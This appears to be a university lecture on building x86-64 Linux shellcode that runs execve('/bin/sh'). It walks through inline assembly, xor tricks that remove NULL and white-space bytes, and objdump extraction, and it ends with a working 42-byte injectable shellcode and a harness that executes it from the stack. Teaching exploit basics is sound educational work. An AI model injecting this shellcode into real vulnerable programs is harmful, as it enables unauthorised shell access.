Warning
The code in this lecture must be tested on a native Ubuntu machine or in a VM.
It doesn't work in WSL.
Shellcode: Executing "/bin/sh" Program
A shellcode is code that launches a shell. In the lab, we will create code
for setting up a reverse shell. Naturally, the adversary would like to inject
this shellcode and have the target process run it; then the adversary will gain
a shell.
In this lecture, as preparation for the lab, we will see how to create code
that launches a local shell. To start, consider the following C code, runthis.c.
In the end, we want to create binary executable bytes that would do a
similar task.
#include <unistd.h>
int main( )
{
    char* file = "/bin/sh";
    char* argv[2];
    argv[0] = file;
    argv[1] = 0;
    char** env = 0;
    execve(file, argv, env);
    return 0;
}
Recall that execve executes a program, replacing the calling process with it.
See its man page (man 2 execve).
$ gcc -g runthis.c -o runthis
$ ./runthis
$ exit
$
Note that even after you exit, you still have a prompt. This is because
./runthis started a new shell, "/bin/sh"; the exit command left that shell and
returned you to the original one.
Shellcode
A shellcode is just the assembly version of the code calling
execve("/bin/sh", ...) as above.
Shellcode Requirements
Since the shellcode will be injected as data into a target program, the
following conditions should be met for it to work:
- [REQ1] Embedding the string "/bin/sh" in the shellcode itself. The target
program probably won't contain the string "/bin/sh" (and even if it does,
we don't know where it is in memory). To address this issue, the
shellcode itself creates and stores the string "/bin/sh" in memory so
that the execve() function can use it.
- [REQ2] The shellcode itself should be injectable string data. In other
words,
- The shellcode should contain neither a NULL character nor
a white-space character (space, tab, or newline).
This is because the target function would probably take the shellcode as
a string input. For example, scanf("%s") stops reading at the first
white-space character, and string functions such as strcpy() stop copying at
the first NULL character. In either case, only the part of the shellcode
before that character gets injected, and the attack fails.
So it should pass the following Python function:
def injectable(code_data):
    if b" " in code_data or b"\n" in code_data \
       or b"\r" in code_data or b"\t" in code_data \
       or b"\0" in code_data:
        return False
    return True
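When a byte string fails the check, it helps to know where the offending bytes are. The following is a minimal sketch of one way to list them; the helper name offending_bytes and the sample bytes are made up for illustration and are not part of the lab code.

```python
# Bytes that [REQ2] forbids: NULL, space, tab, newline, carriage return.
FORBIDDEN = b"\x00 \t\n\r"

def offending_bytes(code_data):
    """Return (offset, byte value) pairs for every forbidden byte."""
    return [(i, b) for i, b in enumerate(code_data) if b in FORBIDDEN]

# A made-up 4-byte sample: the NULL at offset 2 is the only problem.
sample = bytes([0x48, 0x31, 0x00, 0x50])
print(offending_bytes(sample))   # [(2, 0)]
```

An empty list corresponds to injectable() returning True.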
Satisfying [REQ1]: Encoding the string "/bin/sh" into a number
Creating and storing a string needs some creativity. We can do something like
the following:
- Encode the 8-byte string "/bin/sh\0" (7 characters plus the terminating
NULL) into an integer.
See the following Python script (this should make sense to you).
>>> s = b'/bin/sh\0'
>>> n = int.from_bytes(s, 'little')
>>> hex(n)
'0x68732f6e69622f'
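The reason for 'little' is that x86-64 stores the lowest byte of an integer at the lowest address. As a quick sanity check (a sketch, not part of the lab code; the variable name in_memory is made up), converting the number back to 8 little-endian bytes should give the original string:

```python
s = b"/bin/sh\0"                      # 8 bytes, including the terminating NULL
n = int.from_bytes(s, "little")       # the first byte '/' becomes the lowest byte

# Converting back to 8 little-endian bytes gives the memory layout
# that storing n as a 64-bit value produces on x86-64.
in_memory = n.to_bytes(8, "little")
print(hex(n))        # 0x68732f6e69622f
print(in_memory)     # b'/bin/sh\x00'
```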
Using inline assembly code
// trial1.c
#include <stdio.h>
int main( )
{
    asm("movabsq $0x68732f6e69622f, %rax");
    asm("push %rax");
    printf("a lot more to do...\n");
    return 0;
}
- [create "/bin/sh"]: the movabsq instruction.
The part movabs means "move an absolute value", and the suffix
q means a quad-word (an 8-byte number). This instruction puts our magic
number into register rax.
- [store it in memory]: the push instruction.
We push this string (held by rax) onto the stack.
The following GDB log confirms that our code works!
(gdb) l
1 // trial1.c
2 #include <stdio.h>
3
4 int main( )
5 {
6 asm("movabsq $0x68732f6e69622f, %rax");
7 asm("push %rax");
8
9 printf("a lot more to do...\n");
10 return 0;
(gdb) b 6
Breakpoint 1 at 0x63e: file trial1.c, line 6.
(gdb) r
Starting program: /mnt/c/choi0/02teaching/it432/lec/l15/trial1
Breakpoint 1, main () at trial1.c:6
6 asm("movabsq $0x68732f6e69622f, %rax");
(gdb) stepi
7 asm("push %rax");
(gdb) p/x $rax
$1 = 0x68732f6e69622f
(gdb) stepi
9 printf("a lot more to do...\n");
(gdb) hd $rsp 20
0x7ffffffee008: 2F 62 69 6E / b i n
0x7ffffffee00c: 2F 73 68 00 / s h .
0x7ffffffee010: 60 06 00 08 ` . . .
0x7ffffffee014: 00 00 00 00 . . . .
0x7ffffffee018: F7 1B 02 FF . . . .
It will be easier to understand the above if you remember that stepi executes the
instruction shown right above it.
- The first stepi executes line 6, i.e., movabsq.
- The second stepi executes line 7, i.e., push.
Meeting [REQ2]
Now, let's see how these assembly instructions are translated into actual
binary bytes. The objdump tool is useful here.
$ objdump -d trial1
...
000000000000063a <main>:
63a: 55 push %rbp
63b: 48 89 e5 mov %rsp,%rbp
63e: 48 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%rax
645: 73 68 00
648: 50 push %rax
649: 48 8d 3d 94 00 00 00 lea 0x94(%rip),%rdi # 6e4 <_IO_stdin_used+0x4>
650: e8 bb fe ff ff callq 510 <puts@plt>
655: b8 00 00 00 00 mov $0x0,%eax
65a: 5d pop %rbp
65b: c3 retq
Unfortunately, we have a problem here. The last byte of the movabs instruction
is 00, so it is not injectable! Written out as a full 8-byte value, our magic
number is 0x0068732f6e69622f; the leading 00 is the terminating NULL of the
string.
Fix: xor two numbers
We fix this problem using xor. That is, choose two 8-byte numbers a
and b (with no 0x00 byte anywhere, to satisfy [REQ2]) such that
0x68732f6e69622f == a xor b.
As shown in the Python script below, I chose a = 0x11....11 for
convenience. Then, we can easily find b.
>>> n = 0x68732f6e69622f
>>> a = 0x1111111111111111
>>> b = a ^ n # a xor n
>>> hex(b)
'0x1179623e7f78733e'
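The choice a = 0x11....11 is not special; any a works as long as neither a nor b contains a forbidden byte. The sketch below searches repeated-byte masks for such a pair. The helper names has_forbidden and split_xor are made up for illustration, and the pair it finds may differ from the one used in this lecture.

```python
def has_forbidden(value):
    """True if any of the 8 bytes of value is NULL or white space."""
    return any(b in b"\x00 \t\n\r" for b in value.to_bytes(8, "little"))

def split_xor(n):
    """Find (a, b) with a ^ b == n, trying a = 0x0101..01, 0x0202..02, ..."""
    for k in range(1, 256):
        a = int.from_bytes(bytes([k]) * 8, "little")
        b = a ^ n
        if not has_forbidden(a) and not has_forbidden(b):
            return a, b
    raise ValueError("no repeated-byte mask works for this value")

n = 0x68732F6E69622F
a, b = split_xor(n)
assert a ^ b == n            # xor-ing the pair recovers the magic number
print(hex(a), hex(b))
```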
Pushing "/bin/sh" to the stack
Therefore, we can write the code as follows.
asm("movabsq $0x1111111111111111, %rax");
asm("movabsq $0x1179623e7f78733e, %rbx");
asm("xor %rbx, %rax"); // %rax ← %rbx xor %rax
asm("push %rax");
Passing Arguments Into the execve() Function
As you can see from the reference,
in x86-64, we use the following registers for passing arguments.
- First argument: rdi
- Second argument: rsi
- Third argument: rdx
First argument: set rdi
Recall that the first argument is the address of "/bin/sh". Since we just
pushed the "/bin/sh" on to the stack, $rsp is actually the location of the
string. So, we set %rdi ← %rsp.
asm("mov %rsp, %rdi"); // %rdi ← %rsp
For reference, here is runthis.c again:
#include <unistd.h>
int main( )
{
    char* file = "/bin/sh";
    char* argv[2];
    argv[0] = file;
    argv[1] = 0;
    char** env = 0;
    execve(file, argv, env);
    return 0;
}
Second argument: set rsi
The second argument is argv. Since it has two entries, we first
push two objects on the stack (as the array elements of argv).
Note:
- A stack has the property of "first in, last out". So, we have to push the
elements in reverse order: first push the 2nd element, and then push the 1st
element.
- The 2nd element argv[1] is 0. So, push 0. You cannot use the immediate 0
directly, because its encoding would contain 00 bytes and violate [REQ2].
As before, we use the xor trick.
asm("xor %rax, %rax"); // xor trick; %rax ← 0
asm("push %rax"); // push 0
- The 1st element argv[0] is the location of "/bin/sh". Luckily, rdi has it!
So, we just push the value of rdi on the stack.
asm("push %rdi"); // rdi has the location of "/bin/sh"
- Now, we can finally set rsi for the second argument argv to execve.
Since we just pushed the array contents of argv, the location of argv is
again the top of the stack. This means we can just do %rsi ← %rsp.
asm("mov %rsp, %rsi"); // %rsi ← %rsp
Third argument: set rdx
The third argument env can be set to 0. That is, we can set rdx to 0.
asm("xor %rdx, %rdx"); // %rdx ← 0
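The three register assignments above can be checked with a toy model of the stack. This is only an illustrative sketch: the dictionaries mem and reg, the push helper, and the starting rsp value are all made up, and real memory is byte-addressed rather than a table of 8-byte slots.

```python
# Toy model of the stack: a dict from address to 8-byte value.
# The starting rsp is an arbitrary made-up address.
mem = {}
reg = {"rsp": 0x7FFFFFFFE000}

def push(value):
    reg["rsp"] -= 8              # the stack grows toward lower addresses
    mem[reg["rsp"]] = value

push(0x0068732F6E69622F)         # "/bin/sh\0"
reg["rdi"] = reg["rsp"]          # 1st argument: address of the string
push(0)                          # argv[1] = NULL
push(reg["rdi"])                 # argv[0] = address of "/bin/sh"
reg["rsi"] = reg["rsp"]          # 2nd argument: address of argv
reg["rdx"] = 0                   # 3rd argument: env = NULL

argv0 = mem[reg["rsi"]]          # first array entry
argv1 = mem[reg["rsi"] + 8]      # second array entry
print(argv0 == reg["rdi"], argv1 == 0)   # True True
```

Because argv[0] was pushed last, it sits at the lower address, which is exactly where rsi points.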
Calling execve in Assembly
Now, we are ready to call execve. The function is in fact a system call.
See the syscall table in the
GitHub page of Linus Torvalds.
The index for execve in the syscall table is 59.
This is the way to make a system call:
- Have rax contain the right index for the system call (i.e., 59 in our case).
asm("mov $59, %rax");
- Run syscall instruction.
asm("syscall");
The Overall Code
// trial2.c
#include <stdio.h>
int main( )
{
    // first argument: rdi
    asm("movabsq $0x1111111111111111, %rax");
    asm("movabsq $0x1179623e7f78733e, %rbx");
    asm("xor %rbx, %rax");
    asm("push %rax");
    asm("mov %rsp, %rdi");
    // second argument: rsi
    asm("xor %rax, %rax");
    asm("push %rax");
    asm("push %rdi");
    asm("mov %rsp, %rsi");
    // third argument: rdx
    asm("xor %rdx, %rdx");
    // execve
    asm("mov $59, %rax");
    asm("syscall");
    return 0;
}
It works like a charm!
$ gcc trial2.c -o trial2
$ ./trial2
$ exit
[REQ2] Check: Oops in the last mov instruction
$ objdump -d trial2
00000000000005fa <main>:
5fa: 55 push %rbp
5fb: 48 89 e5 mov %rsp,%rbp
5fe: 48 b8 11 11 11 11 11 movabs $0x1111111111111111,%rax
605: 11 11 11
608: 48 bb 3e 73 78 7f 3e movabs $0x1179623e7f78733e,%rbx
60f: 62 79 11
612: 48 31 d8 xor %rbx,%rax
615: 50 push %rax
616: 48 89 e7 mov %rsp,%rdi
619: 48 31 c0 xor %rax,%rax
61c: 50 push %rax
61d: 57 push %rdi
61e: 48 89 e6 mov %rsp,%rsi
621: 48 31 d2 xor %rdx,%rdx
624: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
62b: 0f 05 syscall
62d: b8 00 00 00 00 mov $0x0,%eax
632: 5d pop %rbp
633: c3 retq
634: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
63b: 00 00 00
63e: 66 90 xchg %ax,%ax
Fix
The instruction mov $0x3b,%rax at offset 624 is encoded as
48 c7 c0 3b 00 00 00, and the three 00 bytes violate [REQ2].
Fortunately, we can easily fix the problem by replacing
asm("mov $59, %rax");
with
asm("mov $59, %al"); // %rax already contains 0 here due to xor %rax, %rax
As shown in the reference,
%al is the lowest 8 bits of %rax. Since %rax contains 0 at the moment, setting
%al to 59 sets %rax to 59.
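The fix depends on %rax being 0 beforehand, because writing %al leaves the upper 56 bits untouched. The following sketch models that behavior with plain integer arithmetic; the function name mov_imm8_to_al and the nonzero sample value are made up for illustration.

```python
def mov_imm8_to_al(rax, imm8):
    """Model of 'mov $imm8, %al': replace only the lowest 8 bits of rax."""
    return (rax & ~0xFF & 0xFFFFFFFFFFFFFFFF) | (imm8 & 0xFF)

# With rax == 0 (our case), the whole register becomes 59.
print(mov_imm8_to_al(0, 59))                         # 59
# With leftover upper bits, rax would NOT be 59 afterwards.
print(hex(mov_imm8_to_al(0x1122334455667788, 59)))   # 0x112233445566773b
```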
Final Shellcode
Source code: trial2.c.
$ objdump -d trial2
00000000000005fa <main>:
5fa: 55 push %rbp
5fb: 48 89 e5 mov %rsp,%rbp
5fe: 48 b8 11 11 11 11 11 movabs $0x1111111111111111,%rax
605: 11 11 11
608: 48 bb 3e 73 78 7f 3e movabs $0x1179623e7f78733e,%rbx
60f: 62 79 11
612: 48 31 d8 xor %rbx,%rax
615: 50 push %rax
616: 48 89 e7 mov %rsp,%rdi
619: 48 31 c0 xor %rax,%rax
61c: 50 push %rax
61d: 57 push %rdi
61e: 48 89 e6 mov %rsp,%rsi
621: 48 31 d2 xor %rdx,%rdx
624: b0 3b mov $0x3b,%al
626: 0f 05 syscall
628: b8 00 00 00 00 mov $0x0,%eax
62d: 5d pop %rbp
62e: c3 retq
Extracting only the shellcode bytes, from the first movabs through syscall,
gives the following:
48 b8 11 11 11 11 11 11 11 11
48 bb 3e 73 78 7f 3e 62 79 11
48 31 d8
50
48 89 e7
48 31 c0
50
57
48 89 e6
48 31 d2
b0 3b
0f 05
The bytes above are stored in shtxtcode.txt.
We can run the following python script to get the binary bytes. You need to
understand what's going on here.
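# genshcode.py
# Read the whitespace-separated hex byte values and write them as raw bytes.
with open("shtxtcode.txt") as fin:
    tokens = fin.read().split()
shellcode = bytes(int(t, 16) for t in tokens)
with open("sc.bin", "wb") as fout:
    fout.write(shellcode)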
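As an alternative sketch (not the script used in this lecture), Python's built-in bytes.fromhex can do the same conversion in one call. The example below uses an inline string instead of reading shtxtcode.txt so that it runs on its own; it assumes Python 3.7 or later, where fromhex skips all ASCII white space, including newlines.

```python
hex_text = """
48 b8 11 11 11 11 11 11 11 11
48 bb 3e 73 78 7f 3e 62 79 11
48 31 d8
50
48 89 e7
48 31 c0
50
57
48 89 e6
48 31 d2
b0 3b
0f 05
"""

# bytes.fromhex() skips ASCII white space between the hex pairs.
shellcode = bytes.fromhex(hex_text)
print(len(shellcode))   # 42
```

The length 42 (0x2a) matches the size of sc.bin reported by hexdump.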
The final shellcode is shown below:
$ python3 genshcode.py
$ hexdump -C sc.bin
00000000 48 b8 11 11 11 11 11 11 11 11 48 bb 3e 73 78 7f |H.........H.>sx.|
00000010 3e 62 79 11 48 31 d8 50 48 89 e7 48 31 c0 50 57 |>by.H1.PH..H1.PW|
00000020 48 89 e6 48 31 d2 b0 3b 0f 05 |H..H1..;..|
0000002a
Injectable?
Yes!
>>> shcode = open("sc.bin", "rb").read()
>>> injectable(shcode)
True
Let's Test the ShellCode!
// runthis2.c
#include <stdio.h>      // fopen, fread, fclose
int main()
{
    // read the shellcode into data
    char data[256];
    FILE* fin = fopen("sc.bin", "rb");
    fread(data, sizeof(char), 256, fin);
    fclose(fin);
    void(*f)();     // Declare a variable f
                    // f is a pointer to a function with prototype
                    // void some_func_name ();
    f = (void(*)()) data; // The pointer f now points to data (shellcode)
    f();            // call f:
                    // since f points to the shellcode,
                    // the shellcode will be executed as a function!
    return 0;
}
Compile: -z execstack
For security, the stack is non-executable by default, so any attempt to execute
code on the stack causes a segmentation fault. To turn off this protection, we
add the "-z execstack" option when compiling runthis2.c. This option
allows the program to run code that resides on the stack.
gcc -z execstack runthis2.c -o runthis2
Run!
$ ./runthis2
$ exit
Tip: Checking the assembly instructions of the injected code.
GDB does not readily show the assembly instructions of the injected code.
However, it provides a command that lets us see them. Whenever you want to
check the current assembly instruction, you can run the following
command:
x/i $rip